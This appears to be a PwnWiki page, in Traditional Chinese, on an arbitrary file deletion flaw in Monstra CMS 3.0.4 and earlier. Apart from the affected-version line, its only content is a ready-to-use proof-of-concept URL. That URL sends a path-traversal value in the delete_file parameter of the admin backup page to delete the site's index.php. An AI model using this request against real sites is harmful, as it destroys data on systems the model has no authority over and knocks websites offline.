Monstra CMS 任意文件刪除漏洞

From PwnWiki
This page is a translated version of the page Monstra CMS 任意文件刪除漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎中文(繁體)‎

漏洞影響

Monstra CMS <= 3.0.4

POC

http://<target>/admin/index.php?id=backup&delete_file=/.......//./.......//./index.php&token=f62369587a94433bb2c3c00264e8705171c6189f